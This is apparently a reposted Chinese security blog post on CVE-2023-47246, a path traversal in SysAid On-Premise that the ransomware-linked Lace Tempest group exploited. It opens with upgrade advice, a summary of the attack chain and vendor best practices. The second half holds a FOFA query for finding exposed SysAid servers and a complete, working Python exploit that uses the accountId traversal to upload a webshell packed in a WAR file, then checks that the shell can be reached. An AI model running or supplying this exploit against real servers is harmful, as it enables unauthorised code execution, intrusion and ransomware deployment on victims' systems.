Ots安全
介绍
2023 年 11 月 8 日,SysAid 发布了CVE-2023-47246 的通报,涉及其 SysAid On-Premise 软件上的严重零日漏洞。SysAid 将该漏洞描述为导致同一软件执行代码的路径遍历漏洞。该博客包括针对 SysAid On-Premise 软件客户的即时建议、针对此类漏洞的长期防护的最佳实践以及对攻击链的简要分析。
建议
SysAid 建议使用本地软件的客户执行以下两项操作:
升级至版本23.3.6
执行完整的系统和网络评估以检测潜在的危害
如果发现任何妥协迹象 (IoC),Zscaler 建议 SysAid On-Premise 客户遵循事件响应协议并立即采取行动。此外,Zscaler 强烈建议升级到最新版本。有关升级的更多信息,请访问此处和此处。
起因
据信,Lace Tempest (DEV-0950 / TA-505) 是利用此漏洞的威胁行为者。该组织今年早些时候负责利用MoveIT Transfer 漏洞,并与名为“CL0P”的勒索软件组织有关联。
图 1:描述威胁行为者利用 CVE-2023-47246 漏洞渗透 SysAid 系统的攻击链
可能的执行
怎么运行的
威胁行为者利用 SysAid CVE-2023-47246 路径遍历漏洞,成功将包含 WebShell 和各种有效负载的 WAR 存档上传到 SysAid Tomcat Web 服务的 Webroot 中。该漏洞位于SysAid com.ilient.server.UserEntry类的doPost方法中。利用此漏洞涉及操纵accountID参数以引入路径遍历,从而允许攻击者确定易受攻击的服务器上编写 WebShell 的位置。该攻击是通过发送 POST 请求来执行的,该请求带有压缩的 WAR 文件,其中包含 WebShell 作为请求正文。随后,威胁参与者获得对 WebShell 的访问权限,使他们能够与受感染的系统进行交互。
用于执行 GraceWire 的 PowerShell
威胁参与者利用未经授权的访问来部署 PowerShell 脚本,以在受害者的计算机上执行 GraceWire 加载程序。
PowerShell 脚本(如下图所示)枚举C:\Program Files\SysAidServer\tomcat\webapps\usersfiles目录中列出的所有文件,然后检查以“Sophos”开头的防病毒或反恶意软件进程。如果脚本检测到受害者系统上运行的对抗性软件,则会退出以避免检测。
如果脚本未检测到防病毒或反恶意软件,则会在受害者的计算机上执行 GraceWire 加载程序 (user.exe)。
图 2:用于启动 GraceWire 加载程序的 PowerShell 脚本 (user.exe)
GraceWire 加载程序分析
GraceWire 加载程序遵循一系列步骤。首先,它检查是否存在名为<filename>.bin的文件,其中包含加密的有效负载。如果当前目录中存在该文件,则加载程序将继续使用ReadFile()函数读取其内容,并将数据存储在分配的内存中。随后,它解密加密信息并计算校验和。如果校验和被验证正确,程序将执行解密的bin有效负载。该有效负载旨在部署 GraceWire 木马。此外,加载程序会将 GraceWire 木马注入各种进程,包括:
spoolsv.exe
msiexec.exe
svchost.exe
在检查代码时,我们还发现了调试打印语句,显示了 GraceWire 加载程序的控制流。
图 3:调试打印语句的屏幕截图,展示了 GraceWire 加载程序的控制流程
摆脱证据
一旦渗透到受害者的系统中,威胁行为者就会使用另一个 PowerShell 脚本来系统地消除与其恶意活动相关的痕迹和证据。这种后利用策略旨在通过消除妥协指标 (IoC) 来消除数字足迹并最大程度地减少检测的可能性。
可能的其他利用
微软发布了一条推文,强调了 CL0P 勒索软件中此漏洞的利用情况,并强烈建议系统更新。
此外,SysAid 还发现了支持证据,表明使用了以下 PowerShell 命令来下载和执行 CobaltStrike。
图 4:下载并执行 CobaltStrike 的 PowerShell 命令
最佳实践
通过使用Zscaler Private Access限制横向移动来保护皇冠上的宝石应用程序,尤其是在应用程序安全模块打开的情况下。
通过启用附加应用程序安全模块的 Zscaler Private Access 和Zscaler Internet Access路由所有服务器流量,这将提供正确的可见性来识别和阻止来自受感染系统/服务器的恶意活动。
打开Zscaler 高级威胁防护以阻止所有已知的命令和控制域。如果对手利用此漏洞植入恶意软件,这将提供额外的保护。
使用Zscaler 云防火墙(云 IPS 模块)将命令和控制保护扩展到所有端口和协议,包括新兴的 C2 目的地。同样,如果对手利用此漏洞植入恶意软件,这将提供额外的保护。
使用Zscaler 云沙箱来防止作为第二阶段有效负载的一部分传递的未知恶意软件。
确保您正在检查所有 SSL 流量。
限制从允许的已知良好目的地列表到关键基础设施的流量。
FOFA
body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
https://github.com/W01fh4cker/CVE-2023-47246-EXP/blob/main/CVE-2023-47246-EXP.py
import argparse
import binascii
import random
import time
import zipfile
import zlib
import urllib3
import requests
urllib3.disable_warnings()
def compressFile(shellFile, warFile):
try:
with zipfile.ZipFile(warFile, 'w', zipfile.ZIP_DEFLATED) as zipf:
zipf.write(shellFile)
zipf.close()
return True
except:
return False
def getHexData(warFile):
with open(warFile, 'rb') as warfile:
data = warfile.read()
warfile.close()
compressed_data = zlib.compress(data)
hex_data = binascii.hexlify(compressed_data).decode()
return hex_data
def generateRandomDirectoryName(num):
charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
return ''.join(random.choice(charset) for _ in range(num))
def get_random_agent():
agent_list = [
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (iPad; CPU OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G35 Safari/601.1',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393',
'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/537.86.7',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/52.0.2743.84 Mobile/13G35 Safari/601.1.46',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'
]
return agent_list[random.randint(0, len(agent_list) - 1)]
def shellUpload(url, proxy, directoryName, shellFile):
userEntryUrl = f"{url}/userentry?accountId=/../../../tomcat/webapps/{directoryName}/&symbolName=test&base64UserName=YWRtaW4="
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": get_random_agent()
}
shellFileName = shellFile.split(".")[0]
warFile = f"{shellFileName}.war"
if compressFile(shellFile, warFile):
shellHex = getHexData(warFile=warFile)
data = binascii.unhexlify(shellHex)
resp = requests.post(url=userEntryUrl, headers=headers, data=data, proxies=proxy, verify=False)
print("\033[92m[+] Shell file compressed successfully!\033[0m")
return resp
else:
print("\033[91m[x] Shell file compression failed.\033[0m")
exit(0)
def shellTest(url, proxy, directoryName, shellFile):
userEntryUrl = f"{url}/{directoryName}/{shellFile}"
headers = {
"User-Agent": get_random_agent()
}
resp = requests.get(url=userEntryUrl, headers=headers, timeout=15, proxies=proxy, verify=False)
return resp, userEntryUrl
def exploit(url, proxy, shellFile):
print(f"\033[94m[*] start to attack: {url}\033[0m")
directoryName = generateRandomDirectoryName(5)
userentryResp = shellUpload(url, proxy, directoryName, shellFile)
print(f"\033[94m[*] Wait 9 seconds...\033[0m")
time.sleep(9)
cveTestResp, userEntryUrl = shellTest(url, proxy, directoryName, shellFile)
if userentryResp.status_code == 200 and cveTestResp.status_code == 200:
print(f"\033[92m[+] The website [{url}] has vulnerability CVE-2023-47246! Shell path: {userEntryUrl}\033[0m")
else:
print(f"\033[91m[x] The website [{url}] has no vulnerability CVE-2023-47246.\033[0m")
if __name__ == "__main__":
banner = """
______ _______ ____ ___ ____ _____ _ _ _____ ____ _ _ __
/ ___\ \ / / ____| |___ \ / _ \___ \|___ / | || |___ |___ \| || | / /_
| | \ \ / /| _| _____ __) | | | |__) | |_ \ _____| || |_ / / __) | || |_| '_ \
| |___ \ V / | |__|_____/ __/| |_| / __/ ___) |_____|__ _/ / / __/|__ _| (_) |
\____| \_/ |_____| |_____|\___/_____|____/ |_|/_/ |_____| |_| \___/
Author: W01fh4cker
Blog: https://w01fh4cker.github.io
"""
print(banner)
parser = argparse.ArgumentParser(description="SysAid Server remote code execution vulnerability CVE-2023-47246 Written By W01fh4cker",
add_help="eg: python CVE-2023-47246-RCE.py -u https://192.168.149.150:8443")
parser.add_argument("-u", "--url", help="target URL")
parser.add_argument("-p", "--proxy", help="proxy, eg: http://127.0.0.1:7890")
parser.add_argument("-f", "--file", help="shell file, eg: shell.jsp")
args = parser.parse_args()
if args.url.endswith("/"):
url = args.url[:-1]
else:
url = args.url
if args.proxy:
proxy = {
'http': args.proxy,
'https': args.proxy
}
else:
proxy = {}
exploit(url, proxy, args.file)
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里